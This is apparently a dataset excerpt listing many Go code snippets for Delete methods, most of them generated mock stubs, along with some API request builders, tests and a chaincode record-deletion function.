Delete(ctx context.Context, secretID int32, projectID int32) error {\n\tret := _m.Called(ctx, secretID, projectID)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, int32, int32) error); ok {\n\t\tr0 = rf(ctx, secretID, projectID)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *TeamTemplateDefinitionItemRequestBuilder) Delete(ctx context.Context, requestConfiguration *TeamTemplateDefinitionItemRequestBuilderDeleteRequestConfiguration)(error) {\n requestInfo, err := m.ToDeleteRequestInformation(ctx, requestConfiguration);\n if err != nil {\n return err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n }\n err = m.BaseRequestBuilder.RequestAdapter.SendNoContent(ctx, requestInfo, errorMapping)\n if err != nil {\n return err\n }\n return nil\n}", "func (_m *ServerConnexion) Delete(oath string) error {\n\tret := _m.Called(oath)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string) error); ok {\n\t\tr0 = rf(oath)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *AuthorController) Delete(c *fiber.Ctx) error {\n\tret := _m.Called(c)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(*fiber.Ctx) error); ok {\n\t\tr0 = rf(c)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *DeploymentsClientMock) Delete(ctx context.Context, resourceGroupName, deploymentName string) (resp *http.Response, err error) {\n\tm.mutex.Lock()\n\tdefer m.mutex.Unlock()\n\n\tif _, ok := m.FakeStore[deploymentName]; !ok {\n\t\treturn nil, fmt.Errorf(\"there is no such a deployment with name %s\", deploymentName)\n\t}\n\n\tdelete(m.FakeStore, deploymentName)\n\n\treturn\n}", "func (_m *TemplatesRepositoryMock) Delete(_a0 string) error {\n\tret := _m.Called(_a0)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string) error); ok {\n\t\tr0 = rf(_a0)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *MockBookingStorage) Delete() {\n\t_m.Called()\n}", "func (m *MockProduct) DeleteSharedLicences(arg0 context.Context, arg1 db.DeleteSharedLicencesParams) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"DeleteSharedLicences\", arg0, arg1)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (s *service) Delete(ctx context.Context, id string) error {\n\tif err := s.repo.Delete(ctx, id); err != nil {\n\t\treturn errors.Wrapf(err, \"while deleting Formation Constraint with ID %s\", id)\n\t}\n\n\treturn nil\n}", "func (_m *DomainRepository) Delete(ctx context.Context, id uint) error {\n\tret := _m.Called(ctx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, uint) error); ok {\n\t\tr0 = rf(ctx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *Cache) Delete(ctx context.Context, key string) error {\n\tret := _m.Called(ctx, key)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string) error); ok {\n\t\tr0 = rf(ctx, key)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *EventAPIRepository) Delete(ctx context.Context, tenantID string, id string) error {\n\tret := _m.Called(ctx, tenantID, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, string) error); ok {\n\t\tr0 = rf(ctx, tenantID, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func TestDeleteHCorrectID(t *testing.T) {\n\tdb := DBSession()\n\tdefer db.Close() // clean up when we’re done\n\tSetupData(db)\n\n\ta := assert.New(t)\n\trouter := mux.NewRouter()\n\trouter.HandleFunc(\"/cb_service/contact_book/{id}\", http.HandlerFunc(func(res http.ResponseWriter, req *http.Request) {\n\t\t// save it in the request context\n\t\tctx := context.WithValue(req.Context(), dbSessionKey, db)\n\t\treq.Header.Set(\"Content-Type\", contentType)\n\t\treq.Header.Set(\"Authorization\", encodedAuthToken)\n\t\treq = req.WithContext(ctx)\n\t\tdeleteH(res, req)\n\t}))\n\n\tserver := httptest.NewServer(router)\n\tdefer server.Close()\n\treqURL := server.URL + \"/cb_service/contact_book/\" + contactBookID\n\tres, err := http.Get(reqURL)\n\tif err != nil {\n\t\tl.Printf(\"Cannot Make Request :%v \", err)\n\t\ta.Error(err)\n\t}\n\n\ta.Equal(res.StatusCode, http.StatusOK)\n\tClearData(db)\n}", "func (_m *Bookdatabase) Delete(key string) error {\n\tret := _m.Called(key)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string) error); ok {\n\t\tr0 = rf(key)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *AWSResourceManager) Delete(_a0 context.Context, _a1 types.AWSResource) error {\n\tret := _m.Called(_a0, _a1)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, types.AWSResource) error); ok {\n\t\tr0 = rf(_a0, _a1)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *ExecutionManager) Delete(ctx context.Context, id int64) error {\n\tret := _m.Called(ctx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, int64) error); ok {\n\t\tr0 = rf(ctx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *DAO) DeleteImmutableRule(ctx context.Context, id int64) error {\n\tret := _m.Called(ctx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, int64) error); ok {\n\t\tr0 = rf(ctx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockRouterTx) DELETE(path string, handler interface{}, options ...interface{}) {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{path, handler}\n\tfor _, a := range options {\n\t\tvarargs = append(varargs, a)\n\t}\n\tm.ctrl.Call(m, \"DELETE\", varargs...)\n}", "func (_m *CacheStore) Delete(ctx context.Context, key string) error {\n\tret := _m.Called(ctx, key)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string) error); ok {\n\t\tr0 = rf(ctx, key)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *Usecase) Delete(ctx context.Context, id int64) error {\n\tret := _m.Called(ctx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, int64) error); ok {\n\t\tr0 = rf(ctx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *Usecase) Delete(ctx context.Context, id int64) error {\n\tret := _m.Called(ctx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, int64) error); ok {\n\t\tr0 = rf(ctx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *Repository) Delete(ctx context.Context, id string) error {\n\tret := _m.Called(ctx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string) error); ok {\n\t\tr0 = rf(ctx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (kvclient *MockResKVClient) Delete(ctx context.Context, key string) error {\n\treturn nil\n}", "func (_m *RepositoryMock) Delete(args db_models.DbDTO) error {\n\tret := _m.Called(args)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(db_models.DbDTO) error); ok {\n\t\tr0 = rf(args)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockGeneralRepository) DeleteByContract(network types.Network, indices []string, address string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"DeleteByContract\", network, indices, address)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (_m *MockORM) Delete(value interface{}, where ...interface{}) ORM {\n\tret := _m.Called(value, where)\n\n\tvar r0 ORM\n\tif rf, ok := ret.Get(0).(func(interface{}, ...interface{}) ORM); ok {\n\t\tr0 = rf(value, where...)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(ORM)\n\t\t}\n\t}\n\n\treturn r0\n}", "func (_m *ProductBackend) Delete(productID string) error {\n\tret := _m.Called(productID)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string) error); ok {\n\t\tr0 = rf(productID)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockDeletableStorage) Del(ctx context.Context, keys ...interface{}) error {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{ctx}\n\tfor _, a := range keys {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"Del\", varargs...)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (m *ManagedTenantsManagedTenantTicketingEndpointsManagedTenantTicketingEndpointItemRequestBuilder) Delete(ctx context.Context, requestConfiguration *ManagedTenantsManagedTenantTicketingEndpointsManagedTenantTicketingEndpointItemRequestBuilderDeleteRequestConfiguration)(error) {\n requestInfo, err := m.ToDeleteRequestInformation(ctx, requestConfiguration);\n if err != nil {\n return err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n }\n err = m.BaseRequestBuilder.RequestAdapter.SendNoContent(ctx, requestInfo, errorMapping)\n if err != nil {\n return err\n }\n return nil\n}", "func (_m *Storage) DeleteVeiculo(id int) error {\n\tret := _m.Called(id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(int) error); ok {\n\t\tr0 = rf(id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func TestDeleteConfigurationClientBySubs(t *testing.T) {\n\tcc := &pb.ConfigurationClient{\n\t\tCompanySubsId: \"180-000-123-0321\",\n\t}\n\n\tdb, mock, err := sqlMock.New()\n\tif err != nil {\n\t\tt.Fatalf(\"an error '%s' was not expected when opening a stub database connection\", err)\n\t}\n\n\tdefer db.Close()\n\n\tprepare := mock.ExpectPrepare(\"UPDATE configuration_client\")\n\tprepare.ExpectExec().WithArgs(cc.CompanySubsId).WillReturnResult(sqlMock.NewResult(0, 1))\n\n\tclientRepo := repo.NewPgConfiguration(db)\n\tdeleted, err := clientRepo.DeleteConfigurationClientBySubs(context.TODO(), cc)\n\tassert.NoError(t, err)\n\tassert.True(t, deleted)\n}", "func (_m *RedisSearchClient) Delete(docID string) error {\n\tret := _m.Called(docID)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string) error); ok {\n\t\tr0 = rf(docID)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *FooEntityRepository) Delete(ctx context.Context, id string) error {\n\tret := _m.Called(ctx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string) error); ok {\n\t\tr0 = rf(ctx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (f *FakeInstance) Delete(_ context.Context, _ string) error {\n\tpanic(\"implement me\")\n}", "func (m *ManagerMock) Delete(ctx context.Context, s *hub.Subscription) error {\n\targs := m.Called(ctx, s)\n\treturn args.Error(0)\n}", "func (m *MockReminds) HandleDeleteRemindCommand(arg0 *discordgo.Session, arg1 *discordgo.MessageCreate, arg2 []string, arg3 context.Context) {\n\tm.ctrl.T.Helper()\n\tm.ctrl.Call(m, \"HandleDeleteRemindCommand\", arg0, arg1, arg2, arg3)\n}", "func (_m *Repository) Delete(ctx context.Context, id int, deletedBy string) error {\n\tret := _m.Called(ctx, id, deletedBy)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, int, string) error); ok {\n\t\tr0 = rf(ctx, id, deletedBy)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockVirtualMeshCertificateSigningRequestWriter) DeleteVirtualMeshCertificateSigningRequest(ctx context.Context, key client.ObjectKey, opts ...client.DeleteOption) error {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{ctx, key}\n\tfor _, a := range opts {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"DeleteVirtualMeshCertificateSigningRequest\", varargs...)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (_m *K8sClient) Delete(ctx context.Context, obj client.Object, opts ...client.DeleteOption) error {\n\t_va := make([]interface{}, len(opts))\n\tfor _i := range opts {\n\t\t_va[_i] = opts[_i]\n\t}\n\tvar _ca []interface{}\n\t_ca = append(_ca, ctx, obj)\n\t_ca = append(_ca, _va...)\n\tret := _m.Called(_ca...)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, client.Object, ...client.DeleteOption) error); ok {\n\t\tr0 = rf(ctx, obj, opts...)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *RepositoryVacancy) DeleteVacancy(id uuid.UUID, empId uuid.UUID) error {\n\tret := _m.Called(id, empId)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(uuid.UUID, uuid.UUID) error); ok {\n\t\tr0 = rf(id, empId)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *TeamTemplatesItemDefinitionsItemTeamDefinitionPermissionGrantsResourceSpecificPermissionGrantItemRequestBuilder) Delete(ctx context.Context, requestConfiguration *TeamTemplatesItemDefinitionsItemTeamDefinitionPermissionGrantsResourceSpecificPermissionGrantItemRequestBuilderDeleteRequestConfiguration)(error) {\n requestInfo, err := m.ToDeleteRequestInformation(ctx, requestConfiguration);\n if err != nil {\n return err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": i20a3050780ee0b0cde0a884a4f35429a20d60067e3bcda382ec5400079147459.CreateODataErrorFromDiscriminatorValue,\n }\n err = m.BaseRequestBuilder.RequestAdapter.SendNoContent(ctx, requestInfo, errorMapping)\n if err != nil {\n return err\n }\n return nil\n}", "func (_m *Manager) Delete(ctx context.Context, name string, options metav1.DeleteOptions) error {\n\tret := _m.Called(ctx, name, options)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string, metav1.DeleteOptions) error); ok {\n\t\tr0 = rf(ctx, name, options)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *MockVirtualMeshCertificateSigningRequestClient) DeleteVirtualMeshCertificateSigningRequest(ctx context.Context, key client.ObjectKey, opts ...client.DeleteOption) error {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{ctx, key}\n\tfor _, a := range opts {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"DeleteVirtualMeshCertificateSigningRequest\", varargs...)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (_m *StoreUsecase) Delete(ctx context.Context, id string) error {\n\tret := _m.Called(ctx, id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(context.Context, string) error); ok {\n\t\tr0 = rf(ctx, id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *VirtualMachine) DeleteLXC(vmid uint, purge bool, force bool) (task.Task, error) {\n\tret := _m.Called(vmid, purge, force)\n\n\tvar r0 task.Task\n\tif rf, ok := ret.Get(0).(func(uint, bool, bool) task.Task); ok {\n\t\tr0 = rf(vmid, purge, force)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(task.Task)\n\t\t}\n\t}\n\n\tvar r1 error\n\tif rf, ok := ret.Get(1).(func(uint, bool, bool) error); ok {\n\t\tr1 = rf(vmid, purge, force)\n\t} else {\n\t\tr1 = ret.Error(1)\n\t}\n\n\treturn r0, r1\n}", "func (t *IPDCChaincode) invoke_delete_record(stub shim.ChaincodeStubInterface, args []string, map_specification map[string]interface{}) pb.Response {\r\n\r\n\tfmt.Println(\"***********Entering invoke_delete_record***********\")\r\n\r\n\tif len(args) < 1 {\r\n\r\n\t\tfmt.Println(\"Error: Incorrect number of arguments\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(\"Error: Incorrect number of arguments\")\r\n\t}\r\n\r\n\tvar record_specification map[string]interface{}\r\n\r\n\tvar err error\r\n\r\n\terr = json.Unmarshal([]byte(args[0]), &record_specification)\r\n\r\n\tif err != nil {\r\n\r\n\t\tfmt.Println(\"Error in format of input record\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(\"Error in format of input record\")\r\n\t}\r\n\r\n\tadditional_json, ok := map_specification[\"additional_json\"]\r\n\r\n\tif ok {\r\n\r\n\t\tadditional_json_data, ok1 := additional_json.(map[string]interface{})\r\n\r\n\t\tif ok1 {\r\n\r\n\t\t\tfor spec, _ := range additional_json_data {\r\n\r\n\t\t\t\trecord_specification[spec] = additional_json_data[spec]\r\n\t\t\t}\r\n\t\t} else {\r\n\t\t\tfmt.Println(\"Error: Invalid additional JSON fields in specification\")\r\n\r\n\t\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\t\treturn shim.Error(\"Error: Invalid additional JSON fields in specification\")\r\n\t\t}\r\n\t}\r\n\r\n\tvar keys_map interface{}\r\n\r\n\tvar specs map[string]interface{}\r\n\r\n\tkeys_map, error_keys_map := t.get_keys_map(stub, record_specification)\r\n\r\n\tif error_keys_map != nil {\r\n\r\n\t\tfmt.Println(error_keys_map.Error())\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(error_keys_map.Error())\r\n\t}\r\n\r\n\tspecs, ok = keys_map.(map[string]interface{})\r\n\r\n\tif !ok {\r\n\r\n\t\tfmt.Println(\"Error: Invalid keys_map specification.\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(\"Error: Invalid keys_map specification.\")\r\n\t}\r\n\r\n\tif specs[\"primary_key\"] == nil {\r\n\r\n\t\tfmt.Println(\"Error: invalid primary key specification.\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(\"Error : invalid primary key specification.\")\r\n\t}\r\n\r\n\tvar pk_spec []interface{}\r\n\r\n\tpk_spec, ok = specs[\"primary_key\"].([]interface{})\r\n\r\n\tif !ok {\r\n\r\n\t\tfmt.Println(\"Error in Primary key specification.\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(\"Error in Primary key specification.\")\r\n\t}\r\n\r\n\tkey, err_key := t.createInterfacePrimaryKey(record_specification, pk_spec)\r\n\r\n\tif err_key != nil {\r\n\r\n\t\tfmt.Println(err_key.Error())\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(err_key.Error())\r\n\r\n\t}\r\n\r\n\tvar valAsBytes []byte\r\n\r\n\tvalAsBytes, err = stub.GetState(key)\r\n\r\n\tif err != nil {\r\n\r\n\t\tfmt.Println(\"Error: Failed to get state. \" + err.Error())\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(\"Error: Failed to get state. \" + err.Error())\r\n\r\n\t} else if valAsBytes == nil {\r\n\r\n\t\tfmt.Println(\"Error: No value for primary key : \" + key)\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Success([]byte(\"Error: No value for primary key.\"))\r\n\r\n\t}\r\n\r\n\terr = json.Unmarshal([]byte(valAsBytes), &record_specification)\r\n\r\n\tif err != nil {\r\n\r\n\t\tfmt.Println(\"Error in format of blockchain record.\")\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(\"Error in format of blockchain record.\")\r\n\r\n\t}\r\n\r\n\terr_del := t.delete_composite_keys(stub, specs, record_specification, key)\r\n\r\n\tif err_del != nil {\r\n\r\n\t\tfmt.Println(\"Error in deleting composite keys: \" + err_del.Error())\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(\"Error in deleting composite keys: \" + err_del.Error())\r\n\r\n\t}\r\n\r\n\t//Deleting primary key\r\n\r\n\terr_del = stub.DelState(key)\r\n\r\n\tif err_del != nil {\r\n\r\n\t\tfmt.Println(\"Error in deleting primary key: \" + err_del.Error())\r\n\r\n\t\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\t\treturn shim.Error(\"Error in deleting primary key: \" + err_del.Error())\r\n\r\n\t}\r\n\r\n\tfmt.Println(\"***********Exiting invoke_delete_record***********\")\r\n\r\n\treturn shim.Success(nil)\r\n\r\n}", "func (m *MockProviderClient) DeleteCloudformationStack(arg0 context.Context, arg1 map[string]string, arg2 string) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"DeleteCloudformationStack\", arg0, arg1, arg2)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (m *NotificationMessageTemplatesNotificationMessageTemplateItemRequestBuilder) Delete(ctx context.Context, requestConfiguration *NotificationMessageTemplatesNotificationMessageTemplateItemRequestBuilderDeleteRequestConfiguration)(error) {\n requestInfo, err := m.ToDeleteRequestInformation(ctx, requestConfiguration);\n if err != nil {\n return err\n }\n errorMapping := i2ae4187f7daee263371cb1c977df639813ab50ffa529013b7437480d1ec0158f.ErrorMappings {\n \"4XX\": ia572726a95efa92ddd544552cd950653dc691023836923576b2f4bf716cf204a.CreateODataErrorFromDiscriminatorValue,\n \"5XX\": ia572726a95efa92ddd544552cd950653dc691023836923576b2f4bf716cf204a.CreateODataErrorFromDiscriminatorValue,\n }\n err = m.BaseRequestBuilder.RequestAdapter.SendNoContent(ctx, requestInfo, errorMapping)\n if err != nil {\n return err\n }\n return nil\n}", "func (m *MockCache) Del(ctx context.Context, keys ...string) (int64, error) {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{ctx}\n\tfor _, a := range keys {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"Del\", varargs...)\n\tret0, _ := ret[0].(int64)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (m *MockContainerOperations) Delete(ctx context.Context) error {\n\treturn m.MockDelete(ctx)\n}", "func (_m *Repository) Delete(ctx context.Context, id string, deleted_by string) error {\n\tret := _m.Called(ctx, id,deleted_by)\n\n\tvar r1 error\n\tif rf, ok := ret.Get(0).(func(context.Context,string,string) error); ok {\n\t\tr1 = rf(ctx, id,deleted_by)\n\t} else {\n\t\tr1 = ret.Error(0)\n\t}\n\n\treturn r1\n}", "func TestDeleteCmdWithProject(t *testing.T) {\n\tfuncYaml := `name: bar\nnamespace: \"\"\nruntime: go\nimage: \"\"\nimageDigest: \"\"\nbuilder: quay.io/boson/faas-go-builder\nbuilderMap:\n default: quay.io/boson/faas-go-builder\nenvs: []\nannotations: {}\n`\n\ttmpDir, err := ioutil.TempDir(\"\", \"bar\")\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer os.RemoveAll(tmpDir)\n\n\tf, err := os.Create(filepath.Join(tmpDir, \"func.yaml\"))\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer f.Close()\n\n\t_, err = f.WriteString(funcYaml)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tf.Close()\n\n\toldWD, err := os.Getwd()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer func() {\n\t\terr = os.Chdir(oldWD)\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t}()\n\terr = os.Chdir(tmpDir)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\ttr := &testRemover{}\n\tcmd := NewDeleteCmd(func(ns string, verbose bool) (fn.Remover, error) {\n\t\treturn tr, nil\n\t})\n\n\tcmd.SetArgs([]string{\"-p\", \".\"})\n\terr = cmd.Execute()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tif tr.invokedWith == nil {\n\t\tt.Fatal(\"fn.Remover has not been invoked\")\n\t}\n\n\tif *tr.invokedWith != \"bar\" {\n\t\tt.Fatalf(\"expected fn.Remover to be called with 'bar', but was called with '%s'\", *tr.invokedWith)\n\t}\n}", "func (_m *MockRepository) Delete(scope *jsonapi.Scope) *unidb.Error {\n\tret := _m.Called(scope)\n\n\tvar r0 *unidb.Error\n\tif rf, ok := ret.Get(0).(func(*jsonapi.Scope) *unidb.Error); ok {\n\t\tr0 = rf(scope)\n\t} else {\n\t\tif ret.Get(0) != nil {\n\t\t\tr0 = ret.Get(0).(*unidb.Error)\n\t\t}\n\t}\n\n\treturn r0\n}", "func (_m *UserRepositoryI) Delete(tx database.TransactionI, user *models.UserPrivateInfo) error {\n\tret := _m.Called(tx, user)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(database.TransactionI, *models.UserPrivateInfo) error); ok {\n\t\tr0 = rf(tx, user)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *ORM) DeleteChain(id utils.Big) error {\n\tret := _m.Called(id)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(utils.Big) error); ok {\n\t\tr0 = rf(id)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *ChannelStore) Delete(channelID string, timestamp int64) error {\n\tret := _m.Called(channelID, timestamp)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string, int64) error); ok {\n\t\tr0 = rf(channelID, timestamp)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_m *FileRepository) Delete(id string, ownerId string) error {\n\tret := _m.Called(id, ownerId)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string, string) error); ok {\n\t\tr0 = rf(id, ownerId)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (m *VirtualMachinesClientMock) Delete(ctx context.Context, resourceGroupName string, VMName string) *retry.Error {\n\targs := m.Called(resourceGroupName, VMName)\n\tif args.Error(1) != nil {\n\t\treturn &retry.Error{RawError: args.Error(1)}\n\t}\n\treturn nil\n}", "func (m *MockVirtualMeshCertificateSigningRequestWriter) DeleteAllOfVirtualMeshCertificateSigningRequest(ctx context.Context, opts ...client.DeleteAllOfOption) error {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{ctx}\n\tfor _, a := range opts {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"DeleteAllOfVirtualMeshCertificateSigningRequest\", varargs...)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (_m *ICacheInteractor) Delete(key string) error {\n\tret := _m.Called(key)\n\n\tvar r0 error\n\tif rf, ok := ret.Get(0).(func(string) error); ok {\n\t\tr0 = rf(key)\n\t} else {\n\t\tr0 = ret.Error(0)\n\t}\n\n\treturn r0\n}", "func (_obj *DataService) DeleteApplyWithContext(tarsCtx context.Context, wx_id string, club_id string, affectRows *int32, _opt ...map[string]string) (ret int32, err error) {\n\n\tvar length int32\n\tvar have bool\n\tvar ty byte\n\t_os := codec.NewBuffer()\n\terr = _os.Write_string(wx_id, 1)\n\tif err != nil {\n\t\treturn ret, err\n\t}\n\n\terr = _os.Write_string(club_id, 2)\n\tif err != nil {\n\t\treturn ret, err\n\t}\n\n\terr = _os.Write_int32((*affectRows), 3)\n\tif err != nil {\n\t\treturn ret, err\n\t}\n\n\tvar _status map[string]string\n\tvar _context map[string]string\n\tif len(_opt) == 1 {\n\t\t_context = _opt[0]\n\t} else if len(_opt) == 2 {\n\t\t_context = _opt[0]\n\t\t_status = _opt[1]\n\t}\n\t_resp := new(requestf.ResponsePacket)\n\n\terr = _obj.s.Tars_invoke(tarsCtx, 0, \"deleteApply\", _os.ToBytes(), _status, _context, _resp)\n\tif err != nil {\n\t\treturn ret, err\n\t}\n\n\t_is := codec.NewReader(tools.Int8ToByte(_resp.SBuffer))\n\terr = _is.Read_int32(&ret, 0, true)\n\tif err != nil {\n\t\treturn ret, err\n\t}\n\n\terr = _is.Read_int32(&(*affectRows), 3, true)\n\tif err != nil {\n\t\treturn ret, err\n\t}\n\n\tif len(_opt) == 1 {\n\t\tfor k := range _context {\n\t\t\tdelete(_context, k)\n\t\t}\n\t\tfor k, v := range _resp.Context 